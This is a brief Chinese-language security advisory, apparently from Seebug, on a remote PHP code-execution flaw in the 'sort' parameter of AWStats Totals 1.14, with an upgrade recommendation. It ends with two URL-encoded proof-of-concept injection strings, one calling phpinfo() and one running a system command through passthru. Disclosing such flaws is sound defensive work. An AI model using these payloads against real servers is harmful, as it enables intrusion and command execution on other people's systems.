AWStats Totals 'sort'参数远程命令执行漏洞

2008-08-27T00:00:00
ID SSV:3925
Type seebug
Reporter Root
Modified 2008-08-27T00:00:00

Description

BUGTRAQ ID:30856 CNCAN ID:CNCAN-2008082701

Telartis's AWStats Totals是一款基于PHP的脚本程序。 Telartis's AWStats Totals不正确处理URL参数,远程攻击者可以利用漏洞以应用程序权限执行任意代码。 问题是脚本对提交给'sort'参数的数据缺少过滤,提交特殊的字符可插入PHP表达式,以WEB权限执行。

Telartis AWStats Totals 1.14 升级到AWStats Totals 1.15: <a href=http://www.telartis.nl/xcms/awstats/ target=_blank>http://www.telartis.nl/xcms/awstats/</a>

                                        
                                            
                                                http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%
2eexit%28%29%2e%24a%5b%22
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27
id%27%29%2eexit%28%29%2e%24a%5b%22